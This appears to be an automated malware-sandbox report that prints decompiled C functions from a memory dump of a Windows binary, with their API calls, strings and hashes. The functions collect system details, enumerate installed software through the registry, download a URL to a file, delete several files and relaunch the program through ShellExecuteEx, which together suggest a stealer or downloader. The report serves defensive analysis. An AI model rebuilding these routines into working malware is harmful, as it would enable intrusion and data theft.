Opcode ID: 6e33f4ce38083ff7b37a03c35c20bb02f71f10d8759b3d124547ebe8ee3494ab
Instruction ID: 005bb29d0965b153803fb6c2a5b708b5c4ec061733ed871bffd614fd7ce5bc9f
Opcode Fuzzy Hash: 6e33f4ce38083ff7b37a03c35c20bb02f71f10d8759b3d124547ebe8ee3494ab
Instruction Fuzzy Hash: DF31E974A44209EFDB14DF94C888BAEB7B5FB88300F1081A9E915AB390D778AA51CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 45
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00409B30(void* __ecx) {
				void* _v8;
				long _v16;
				long _v20;
				struct _MEMORYSTATUSEX _v84;
				void* _t18;
				void* _t24;
				long _t28;

				_t24 = __ecx;
				_v8 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t18 = E0040A230(_t24,  &_v84, 0, 0x40);
				_v84.dwLength = 0x40;
				GlobalMemoryStatusEx( &_v84); // executed
				if(_t18 != 1) {
					_v20 = 0;
					_v16 = 0;
				} else {
					_t28 = _v84.ullAvailPhys;
					_v20 = E004124F0(_v84.ullTotalPhys, _t28, 0x100000, 0);
					_v16 = _t28;
				}
				_push(_v16);
				wsprintfA(_v8, "%d MB", _v20);
				return _v8;
			}

0x00409b30
0x00409b4a
0x00409b55
0x00409b5a
0x00409b65
0x00409b6e
0x00409b8c
0x00409b93
0x00409b70
0x00409b77
0x00409b84
0x00409b87
0x00409b87
0x00409b9d
0x00409bab
0x00409bba

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00409B3D
RtlAllocateHeap.NTDLL(00000000), ref: 00409B44
GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00409B65
__aulldiv.LIBCMT ref: 00409B7F
wsprintfA.USER32 ref: 00409BAB

Strings

@, xrefs: 00409B5A
%d MB, xrefs: 00409BA2

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$AllocateGlobalMemoryProcessStatus__aulldivwsprintf
String ID: %d MB$@
API String ID: 1667388636-3474575989
Opcode ID: 756e4cb98b9b5fd14211630fd2fa5f7f325049ae13929f62b4ab91cd99fb4771
Instruction ID: b70eee315a22d36e5a4f88f725d6d4da99ec9b88fb9d0f2dbc992fa5d77e3577
Opcode Fuzzy Hash: 756e4cb98b9b5fd14211630fd2fa5f7f325049ae13929f62b4ab91cd99fb4771
Instruction Fuzzy Hash: C9010CB1D44208ABDB00EFD4DC49FAFB7B8BB44704F108559F605AB285D7B9AA018B99

Uniqueness

Uniqueness Score: -1.00%

Function 00403D30, Relevance: 12.1, APIs: 8, Instructions: 88
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00403D30(char* _a4, CHAR* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				struct _OVERLAPPED* _v20;
				void _v1044;
				long _v1052;
				void* _v1056;
				long _v1060;
				void* _t27;
				void* _t29;
				void* _t30;
				int _t38;
				int _t42;

				_v20 = 0;
				_t27 = InternetOpenA(0x413042, 1, 0, 0, 0); // executed
				_v1056 = _t27;
				if(_v1056 != 0) {
					_t29 = InternetOpenUrlA(_v1056, _a4, 0, 0, 0x100, 0); // executed
					_v12 = _t29;
					_t30 = CreateFileA(_a8, 0x40000000, 3, 0, 2, 0x80, 0); // executed
					_v16 = _t30;
					while(1 != 0) {
						_t38 = InternetReadFile(_v12,  &_v1044, 0x400,  &_v1052); // executed
						if(_t38 == 0) {
							L8:
							break;
						}
						if(_v1052 <= 0) {
							L9:
							_v8 = _v8 + _v1052;
							if(_v1052 >= 0x400) {
								continue;
							}
							break;
						}
						_t42 = WriteFile(_v16,  &_v1044, _v1052,  &_v1060, 0); // executed
						if(_t42 == 0 || _v1052 != _v1060) {
							goto L8;
						} else {
							goto L9;
						}
					}
					E0040A270( &_v1044, 0x400);
					FindCloseChangeNotification(_v16); // executed
					InternetCloseHandle(_v12); // executed
					return InternetCloseHandle(_v1056);
				}
				return _t27;
			}

0x00403d39
0x00403d4d
0x00403d53
0x00403d60
0x00403d7d
0x00403d83
0x00403d9c
0x00403da2
0x00403da5
0x00403dc5
0x00403dcd
0x00403e0b
0x00000000
0x00403e0b
0x00403dd6
0x00403e0d
0x00403e16
0x00403e23
0x00000000
0x00403e27
0x00000000
0x00403e25
0x00403df3
0x00403dfb
0x00000000
0x00000000
0x00000000
0x00000000
0x00403dfb
0x00403e38
0x00403e41
0x00403e4b
0x00000000
0x00403e58
0x00000000

APIs

InternetOpenA.WININET(00413042,00000001,00000000,00000000,00000000), ref: 00403D4D
InternetOpenUrlA.WININET(00000000,00405400,00000000,00000000,00000100,00000000), ref: 00403D7D
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00403D9C
InternetReadFile.WININET(00405400,?,00000400,?), ref: 00403DC5
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403DF3
FindCloseChangeNotification.KERNEL32(?,?,00000400), ref: 00403E41
InternetCloseHandle.WININET(00405400), ref: 00403E4B
InternetCloseHandle.WININET(00000000), ref: 00403E58

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Internet$CloseFile$HandleOpen$ChangeCreateFindNotificationReadWrite
String ID:
API String ID: 2209595824-0
Opcode ID: 49adb47c2812f367813b8a4de4252588a2403f3b24f2e627f43189b0f6cb49ed
Instruction ID: 57195000e626bdfb9430fb6306d17c79f54dcbd22ef9337652028b44d60f322d
Opcode Fuzzy Hash: 49adb47c2812f367813b8a4de4252588a2403f3b24f2e627f43189b0f6cb49ed
Instruction Fuzzy Hash: 593100B5A40218ABEB20DF60DC45FDA7BB8AB44705F1085A9B705B62C0D7749BC5CF9C

Uniqueness

Uniqueness Score: -1.00%

Function 004106D0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004106D0(intOrPtr __ecx, signed int _a4, long _a8, intOrPtr _a12) {
				long _v8;
				void* _v12;
				signed int _v16;
				long _v20;
				intOrPtr _v24;
				void* _t89;
				intOrPtr _t90;
				void* _t92;
				intOrPtr _t112;
				intOrPtr _t136;
				intOrPtr _t141;

				_v24 = __ecx;
				if( *(_v24 + 4) != 0 ||  *(_v24 + 0xc) != 0 ||  *(_v24 + 0x20) != 0 ||  *((intOrPtr*)(_v24 + 0x18)) != 0 ||  *((intOrPtr*)(_v24 + 0x14)) != 0 || ( *(_v24 + 0x2c) & 0x000000ff) != 0) {
					return 0x1000000;
				} else {
					__eflags = _a12 - 1;
					if(_a12 != 1) {
						__eflags = _a12 - 2;
						if(__eflags != 0) {
							__eflags = _a12 - 3;
							if(_a12 != 3) {
								return 0x10000;
							}
							_v20 = _a8;
							__eflags = _v20;
							if(_v20 != 0) {
								__eflags = _a4;
								if(_a4 == 0) {
									_t89 = CreateFileMappingW(0xffffffff, 0, 4, 0, _v20, 0); // executed
									 *(_v24 + 0xc) = _t89;
									_t90 = _v24;
									__eflags =  *(_t90 + 0xc);
									if( *(_t90 + 0xc) != 0) {
										_t92 = MapViewOfFile( *(_v24 + 0xc), 0xf001f, 0, 0, _v20); // executed
										 *(_v24 + 0x20) = _t92;
										_t136 = _v24;
										__eflags =  *(_t136 + 0x20);
										if( *(_t136 + 0x20) != 0) {
											L25:
											 *((char*)(_v24 + 0x1c)) = 1;
											 *(_v24 + 0x24) = 0;
											 *(_v24 + 0x28) = _v20;
											return 0;
										}
										CloseHandle( *(_v24 + 0xc));
										 *(_v24 + 0xc) = 0;
										return 0x300;
									}
									return 0x300;
								}
								 *(_v24 + 0x20) = _a4;
								goto L25;
							}
							return 0x30000;
						}
						_v16 = _a4;
						 *(_v24 + 4) = CreateFileW(E0040A110(__eflags, _v16), 0x40000000, 0, 0, 2, 0x80, 0);
						_t141 = _v24;
						__eflags =  *((intOrPtr*)(_t141 + 4)) - 0xffffffff;
						if( *((intOrPtr*)(_t141 + 4)) != 0xffffffff) {
							 *((char*)(_v24 + 0x1c)) = 1;
							 *(_v24 + 0x10) = 0;
							 *((char*)(_v24 + 8)) = 1;
							return 0;
						}
						 *(_v24 + 4) = 0;
						return 0x200;
					}
					_v12 = _a4;
					 *(_v24 + 4) = _v12;
					 *((char*)(_v24 + 8)) = 0;
					_v8 = SetFilePointer( *(_v24 + 4), 0, 0, 1);
					__eflags = _v8 - 0xffffffff;
					 *((char*)(_v24 + 0x1c)) = 0 | _v8 != 0xffffffff;
					_t112 = _v24;
					__eflags =  *(_t112 + 0x1c) & 0x000000ff;
					if(( *(_t112 + 0x1c) & 0x000000ff) == 0) {
						 *(_v24 + 0x10) = 0;
					} else {
						 *(_v24 + 0x10) = _v8;
					}
					return 0;
				}
			}

0x004106d6
0x004106e0
0x00000000
0x0041071b
0x0041071b
0x0041071f
0x00410788
0x0041078c
0x00410800
0x00410804
0x00000000
0x004108c2
0x0041080d
0x00410810
0x00410814
0x00410820
0x00410824
0x0041083f
0x00410848
0x0041084b
0x0041084e
0x00410852
0x0041086f
0x00410878
0x0041087b
0x0041087e
0x00410882
0x004108a2
0x004108a5
0x004108ac
0x004108b9
0x00000000
0x004108bc
0x0041088b
0x00410894
0x00000000
0x0041089b
0x00000000
0x00410854
0x0041082c
0x00000000
0x0041082c
0x00000000
0x00410816
0x00410791
0x004107bc
0x004107bf
0x004107c2
0x004107c6
0x004107df
0x004107e6
0x004107f0
0x00000000
0x004107f4
0x004107cb
0x00000000
0x004107d2
0x00410724
0x0041072d
0x00410733
0x0041074a
0x0041074f
0x00410759
0x0041075c
0x00410763
0x00410765
0x00410775
0x00410767
0x0041076d
0x0041076d
0x00000000
0x0041077c

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 00410744

Strings

."A, xrefs: 0041085B, 00410833, 004108B6

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: FilePointer
String ID: ."A
API String ID: 973152223-1811645918
Opcode ID: 0c5e77c3c0bdedb198325d6188ed53d4fcfe1269ea04963dd290c30c35c8d47f
Instruction ID: 34519dced96219fa28336c885e49b4c2fb09b7c0e93be9bb915a324e156807df
Opcode Fuzzy Hash: 0c5e77c3c0bdedb198325d6188ed53d4fcfe1269ea04963dd290c30c35c8d47f
Instruction Fuzzy Hash: E861D8B4A0420ADFDB14DF54CA44BAAB7B1BB44314F208659E4156B3C1C3B8EEC5CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 00409ECD, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00409ECD() {
				long _t36;
				long _t39;
				long _t42;
				long _t45;
				long _t51;
				char* _t66;
				intOrPtr _t73;
				char* _t76;
				void* _t81;

				L0:
				while(1) {
					L0:
					 *(_t81 - 0xc1c) =  *(_t81 - 0xc1c) + 1;
					if( *(_t81 - 0x814) != 0) {
						break;
					}
					L2:
					 *(_t81 - 0x818) = 0x400;
					_t39 = RegEnumKeyExA( *(_t81 - 0x810),  *(_t81 - 0xc1c), _t81 - 0x408, _t81 - 0x818, 0, 0, 0, 0); // executed
					 *(_t81 - 0x814) = _t39;
					if( *(_t81 - 0x814) != 0) {
						L11:
						continue;
					} else {
						L3:
						_push(_t81 - 0x408);
						_t73 =  *0x417230; // 0xbd2958
						_push(_t73);
						wsprintfA(_t81 - 0x808, "%s\%s");
						_t42 = RegOpenKeyExA(0x80000002, _t81 - 0x808, 0, 0x20019, _t81 - 0x80c); // executed
						if(_t42 == 0) {
							L5:
							 *(_t81 - 0x818) = 0x400;
							_t76 =  *0x41770c; // 0xbc8ba0
							_t45 = RegQueryValueExA( *(_t81 - 0x80c), _t76, 0, _t81 - 4, _t81 - 0xc18, _t81 - 0x818); // executed
							if(_t45 == 0) {
								L6:
								_push(_t81 - 0xc18);
								if( *0x4178e4() > 1) {
									L7:
									 *0x4179f8( *((intOrPtr*)(_t81 + 8)), _t81 - 0xc18);
									 *(_t81 - 0x818) = 0x400;
									_t66 =  *0x417448; // 0xbc8bb8
									_t51 = RegQueryValueExA( *(_t81 - 0x80c), _t66, 0, _t81 - 4, _t81 - 0xc18, _t81 - 0x818); // executed
									if(_t51 == 0) {
										 *0x4179f8( *((intOrPtr*)(_t81 + 8)), " ");
										 *0x4179f8( *((intOrPtr*)(_t81 + 8)), _t81 - 0xc18);
									}
									L9:
									 *0x4179f8( *((intOrPtr*)(_t81 + 8)), "\n");
								}
							}
							L10:
							RegCloseKey( *(_t81 - 0x80c));
							goto L11;
						} else {
							L4:
							RegCloseKey( *(_t81 - 0x80c));
							_t36 = RegCloseKey( *(_t81 - 0x810));
						}
					}
					L13:
					return _t36;
					L14:
				}
				L12:
				_t36 = RegCloseKey( *(_t81 - 0x810));
				goto L13;
			}

0x00409ecd
0x00409ecd
0x00409ecd
0x00409ed6
0x00409ee3
0x00000000
0x00000000
0x00409ee9
0x00409ee9
0x00409f17
0x00409f1d
0x00409f2a
0x0040a065
0x00000000
0x00409f30
0x00409f30
0x00409f36
0x00409f37
0x00409f3d
0x00409f4a
0x00409f6d
0x00409f75
0x00409f96
0x00409f96
0x00409fb4
0x00409fc2
0x00409fca
0x00409fd0
0x00409fd6
0x00409fe0
0x00409fe2
0x00409fed
0x00409ff3
0x0040a011
0x0040a01f
0x0040a027
0x0040a032
0x0040a043
0x0040a043
0x0040a049
0x0040a052
0x0040a052
0x00409fe0
0x0040a058
0x0040a05f
0x00000000
0x00409f77
0x00409f77
0x00409f7e
0x00409f8b
0x00409f8b
0x00409f75
0x0040a077
0x0040a07a
0x00000000
0x0040a07a
0x0040a06a
0x0040a071
0x00000000

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00409F17
wsprintfA.USER32 ref: 00409F4A
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,00000000), ref: 00409F6D
RegCloseKey.ADVAPI32(00000000), ref: 00409F7E
RegCloseKey.ADVAPI32(00000000), ref: 00409F8B
RegQueryValueExA.KERNEL32(00000000,00BC8BA0,00000000,000F003F,?,00000400), ref: 00409FC2
lstrlen.KERNEL32(?), ref: 00409FD7
lstrcat.KERNEL32(?,?), ref: 00409FED
RegQueryValueExA.KERNEL32(00000000,00BC8BB8,00000000,000F003F,?,00000400), ref: 0040A01F
lstrcat.KERNEL32(?,00416C00), ref: 0040A032
lstrcat.KERNEL32(?,?), ref: 0040A043
lstrcat.KERNEL32(?,004165A0), ref: 0040A052
RegCloseKey.ADVAPI32(00000000), ref: 0040A05F
RegCloseKey.ADVAPI32(00000000), ref: 0040A071

Strings

%s\%s, xrefs: 00409F3E

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Closelstrcat$QueryValue$EnumOpenlstrlenwsprintf
String ID: %s\%s
API String ID: 199769609-4073750446
Opcode ID: 879048f1348ce1f754d6c252181584920fb2ebcd9ae4b19e855543129479c621
Instruction ID: 2dc968460cdcb0ab3d2c884d80a3a4b8026bdac28ef1498370b53d99357a6745
Opcode Fuzzy Hash: 879048f1348ce1f754d6c252181584920fb2ebcd9ae4b19e855543129479c621
Instruction Fuzzy Hash: FF110AB195021C9BEB20DF50CD45FE9B3B8FB44704F00C5E8B249A6181DA745AC68FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404D70, Relevance: 10.5, APIs: 7, Instructions: 25
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404D70() {
				CHAR* _t1;
				CHAR* _t5;
				CHAR* _t9;
				int _t10;
				CHAR* _t11;
				CHAR* _t12;
				CHAR* _t13;
				CHAR* _t14;

				_t1 =  *0x417694; // 0xba4e90
				DeleteFileA(_t1);
				_t11 =  *0x4172ec; // 0xba5090
				DeleteFileA(_t11);
				_t13 =  *0x417640; // 0xba50d8
				DeleteFileA(_t13);
				_t5 =  *0x417220; // 0xba0528
				DeleteFileA(_t5);
				_t12 =  *0x4176bc; // 0xbae358
				DeleteFileA(_t12);
				_t14 =  *0x4174a0; // 0xbae4f8
				DeleteFileA(_t14);
				_t9 =  *0x4176f0; // 0xbae5e8
				_t10 = DeleteFileA(_t9); // executed
				return _t10;
			}

0x00404d73
0x00404d79
0x00404d7f
0x00404d86
0x00404d8c
0x00404d93
0x00404d99
0x00404d9f
0x00404da5
0x00404dac
0x00404db2
0x00404db9
0x00404dbf
0x00404dc5
0x00404dcc

APIs

DeleteFileA.KERNEL32(00BA4E90,?,0040557B,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00404D79
DeleteFileA.KERNEL32(00BA5090,?,0040557B,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00404D86
DeleteFileA.KERNEL32(00BA50D8,?,0040557B,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00404D93
DeleteFileA.KERNEL32(00BA0528,?,0040557B,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00404D9F
DeleteFileA.KERNEL32(00BAE358,?,0040557B,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00404DAC
DeleteFileA.KERNEL32(00BAE4F8,?,0040557B,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00404DB9
DeleteFileA.KERNEL32(00BAE5E8,?,0040557B,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00404DC5

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 82e90aa3e40a75eee4fa0eb273520accc6b0fc8499fc7532306f2ef8bcd1dbd8
Instruction ID: 5b3cff0dc2c48af8266bf65b3a31d242e7b914bd29fcbee647819c08d1e1e31a
Opcode Fuzzy Hash: 82e90aa3e40a75eee4fa0eb273520accc6b0fc8499fc7532306f2ef8bcd1dbd8
Instruction Fuzzy Hash: 0EF0D5756187069FC714BFA8FC9CCA63BB9B74C611304C568F60683224CA35E402CBAC

Uniqueness

Uniqueness Score: -1.00%

Function 00409AB0, Relevance: 7.5, APIs: 5, Instructions: 38
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409AB0() {
				void* _v8;
				int _v12;
				void* _v16;
				long _t12;
				char* _t18;
				char* _t19;

				_v12 = 0xff;
				_v16 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t18 =  *0x4171a0; // 0xbd2918
				_t12 = RegOpenKeyExA(0x80000002, _t18, 0, 0x20119,  &_v8); // executed
				if(_t12 == 0) {
					_t19 =  *0x4175d4; // 0xbd2498
					RegQueryValueExA(_v8, _t19, 0, 0, _v16,  &_v12); // executed
				}
				RegCloseKey(_v8);
				return _v16;
			}

0x00409ab6
0x00409ad1
0x00409adf
0x00409aeb
0x00409af3
0x00409b01
0x00409b0c
0x00409b0c
0x00409b16
0x00409b22

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00409AC4
RtlAllocateHeap.NTDLL(00000000), ref: 00409ACB
RegOpenKeyExA.KERNEL32(80000002,00BD2918,00000000,00020119,?), ref: 00409AEB
RegQueryValueExA.KERNEL32(?,00BD2498,00000000,00000000,?,000000FF), ref: 00409B0C
RegCloseKey.ADVAPI32(?), ref: 00409B16

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 75dece95b55f6a47bb47ac3da9060ca078290c7ed40dc41478fa34e8633d817f
Instruction ID: b4919dc753e3cc507b3b6fa1f5030851b5ba9c38a468816697bec1e17b53a2b3
Opcode Fuzzy Hash: 75dece95b55f6a47bb47ac3da9060ca078290c7ed40dc41478fa34e8633d817f
Instruction Fuzzy Hash: E801E1B5A44208BFE700DBE4DC49FEEB778EB48701F1081A9FA05A6291D6705A048B54

Uniqueness

Uniqueness Score: -1.00%

Function 00409D70, Relevance: 7.5, APIs: 5, Instructions: 38
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409D70() {
				void* _v8;
				int _v12;
				void* _v16;
				long _t12;
				char* _t18;
				char* _t19;

				_v12 = 0xff;
				_v16 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t18 =  *0x417600; // 0xbcdc68
				_t12 = RegOpenKeyExA(0x80000002, _t18, 0, 0x20119,  &_v8); // executed
				if(_t12 == 0) {
					_t19 =  *0x4171f4; // 0xbc8af8
					RegQueryValueExA(_v8, _t19, 0, 0, _v16,  &_v12); // executed
				}
				RegCloseKey(_v8);
				return _v16;
			}

0x00409d76
0x00409d91
0x00409d9f
0x00409dab
0x00409db3
0x00409dc1
0x00409dcc
0x00409dcc
0x00409dd6
0x00409de2

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00409D84
RtlAllocateHeap.NTDLL(00000000), ref: 00409D8B
RegOpenKeyExA.KERNEL32(80000002,00BCDC68,00000000,00020119,?), ref: 00409DAB
RegQueryValueExA.KERNEL32(?,00BC8AF8,00000000,00000000,?,000000FF), ref: 00409DCC
RegCloseKey.ADVAPI32(?), ref: 00409DD6

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 7b7deaddc9169bc860f7f97e6b934808b484c1018c288a27d7c7552af26f28b4
Instruction ID: 462b21b348ad4e39b6358e01fd66ae4fce4b16c0e14c958da7ecf583be0cb634
Opcode Fuzzy Hash: 7b7deaddc9169bc860f7f97e6b934808b484c1018c288a27d7c7552af26f28b4
Instruction Fuzzy Hash: F801FFB9A84208FBE700DFE4DC49FEEB778EB48705F1081A9FA05A7291D6705A148B54

Uniqueness

Uniqueness Score: -1.00%

Function 00409BC0, Relevance: 7.5, APIs: 5, Instructions: 38
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409BC0() {
				void* _v8;
				int _v12;
				void* _v16;
				long _t12;
				char* _t18;
				char* _t19;

				_v12 = 0xff;
				_v16 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t18 =  *0x4173f0; // 0xbab588
				_t12 = RegOpenKeyExA(0x80000002, _t18, 0, 0x20119,  &_v8); // executed
				if(_t12 == 0) {
					_t19 =  *0x4174d4; // 0xbc8b88
					RegQueryValueExA(_v8, _t19, 0, 0, _v16,  &_v12); // executed
				}
				RegCloseKey(_v8);
				return _v16;
			}

0x00409bc6
0x00409be1
0x00409bef
0x00409bfb
0x00409c03
0x00409c11
0x00409c1c
0x00409c1c
0x00409c26
0x00409c32

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00409BD4
RtlAllocateHeap.NTDLL(00000000), ref: 00409BDB
RegOpenKeyExA.KERNEL32(80000002,00BAB588,00000000,00020119,?), ref: 00409BFB
RegQueryValueExA.KERNEL32(?,00BC8B88,00000000,00000000,?,000000FF), ref: 00409C1C
RegCloseKey.ADVAPI32(?), ref: 00409C26

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 55844829c1459259806d2952b8444474f65c74f8fc63623153216a0be4c6ffde
Instruction ID: 99ad3475b986ff498d0a0f023781e82cdfc86ece2f1176caa07c4ff0831c663d
Opcode Fuzzy Hash: 55844829c1459259806d2952b8444474f65c74f8fc63623153216a0be4c6ffde
Instruction Fuzzy Hash: 3201ECB5A44208BBE704DBE4DC49FEEB778EB48701F1085A9FA05A6291D6705A048B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACF0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040ACF0(void* __ecx) {
				struct HINSTANCE__* _v32;
				struct HINSTANCE__* _v36;
				struct HINSTANCE__* _v40;
				CHAR* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				struct HINSTANCE__* _v56;
				struct HINSTANCE__* _v60;
				char _v64;
				char _v332;
				char _v596;
				CHAR* _t37;
				intOrPtr _t38;
				intOrPtr _t43;

				E0040A270( &_v596, 0x104);
				E0040A270( &_v332, 0x104);
				GetModuleFileNameA(0,  &_v332, 0x104);
				_t37 =  *0x4172c0; // 0xbcdae8
				wsprintfA( &_v596, _t37,  &_v332);
				E0040A230(_t37,  &_v64, 0, 0x3c);
				_v64 = 0x3c;
				_v60 = 0;
				_v56 = 0;
				_t38 =  *0x417684; // 0xba3cb0
				_v52 = _t38;
				_t43 =  *0x417760; // 0xbc9110
				_v48 = _t43;
				_v44 =  &_v596;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				 *0x417a50( &_v64); // executed
				E0040A270( &_v64, 0x3c);
				E0040A270( &_v596, 0x104);
				return E0040A270( &_v332, 0x104);
			}

0x0040ad05
0x0040ad16
0x0040ad29
0x0040ad36
0x0040ad44
0x0040ad55
0x0040ad5a
0x0040ad61
0x0040ad68
0x0040ad6f
0x0040ad75
0x0040ad78
0x0040ad7e
0x0040ad87
0x0040ad8a
0x0040ad91
0x0040ad98
0x0040ada3
0x0040adaf
0x0040adc0
0x0040add9

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000104,?,00000104), ref: 0040AD29
wsprintfA.USER32 ref: 0040AD44
ShellExecuteEx.SHELL32(0000003C), ref: 0040ADA3

Strings

<, xrefs: 0040AD5A

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExecuteFileModuleNameShellwsprintf
String ID: <
API String ID: 690967290-4251816714
Opcode ID: 6b7428bf2f03a29e2626013a5b9c48ae109a1a15b1264e0ba26830f1c842ddde
Instruction ID: 03e2b0660759dd21619feaaf7d56fc25a5424d058f004be37af8b8136455ca32
Opcode Fuzzy Hash: 6b7428bf2f03a29e2626013a5b9c48ae109a1a15b1264e0ba26830f1c842ddde
Instruction Fuzzy Hash: BF21EDB1944308ABDB14EFA0DC85FDE7778AB44704F0045AEF214B62D0DBB96688CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4A0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040A4A0(char _a4) {
				void* _v8;
				char _v276;

				_t1 =  &_a4; // 0x40543e
				_v8 = OpenProcess(0x410, 0,  *_t1);
				if(_v8 != 0) {
					 *0x417a1c(_v8, 0,  &_v276, 0x104); // executed
					CloseHandle(_v8);
				}
				return  &_v276;
			}

0x0040a4a9
0x0040a4ba
0x0040a4c1
0x0040a4d5
0x0040a4df
0x0040a4df
0x0040a4ee

APIs

OpenProcess.KERNEL32(00000410,00000000,>T@), ref: 0040A4B4
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0040A4D5
CloseHandle.KERNEL32(00000000), ref: 0040A4DF

Strings

>T@, xrefs: 0040A4A9, 0040A4AC

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID: >T@
API String ID: 3183270410-2042611784
Opcode ID: 747698d01497a94029da43ba2e36caa351252a7dd50307a9a3dfd3a9cd3bf6f0
Instruction ID: bc36ae63251258875d0eb145e1fb6c070a100848e55577ebe7fa1591797bba26
Opcode Fuzzy Hash: 747698d01497a94029da43ba2e36caa351252a7dd50307a9a3dfd3a9cd3bf6f0
Instruction Fuzzy Hash: F5F030B590020CEFEB14EB94DD4EBEE7778EB08700F1084A5BB04A7290D6B05A84CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004090B0, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 85
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004090B0(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				char _v8;
				char _v12;
				char _v276;
				char _v540;
				void* _t37;
				void* _t46;
				intOrPtr _t51;
				void* _t65;
				void* _t67;

				_v12 = 0;
				_v8 = 0;
				E0040A270( &_v276, 0x104);
				E0040A350( &_v276,  &_v276, 0x1c); // executed
				 *0x4179f8( &_v276, _a4);
				E0040A270( &_v540, 0x104);
				 *0x4179f8( &_v540,  &_v276);
				_t51 =  *0x41773c; // 0xbbbe10
				 *0x4179f8( &_v540, _t51);
				_t37 = E0040A6C0( &_v540); // executed
				_t67 = _t65 + 0xc;
				if(_t37 != 0) {
					_t46 = E00406450( &_v540,  &_v12,  &_v8); // executed
					_t67 = _t67 + 0xc;
					if(_t46 == 0) {
						E00406350( &_v12,  &_v8);
						_t67 = _t67 + 8;
					}
				}
				_t17 =  &_a12; // 0x405420
				E00407560(0x413042,  &_v276, _a8, _v12, _v8,  *_t17); // executed
				_t22 =  &_a12; // 0x405420
				E00408AA0( &_v276, _a8,  *_t22); // executed
				return E00406350( &_v12,  &_v8);
			}

0x004090b9
0x004090c0
0x004090d3
0x004090e1
0x004090f4
0x00409106
0x00409119
0x0040911f
0x0040912d
0x0040913a
0x0040913f
0x00409144
0x00409155
0x0040915a
0x0040915f
0x00409169
0x0040916e
0x0040916e
0x0040915f
0x00409171
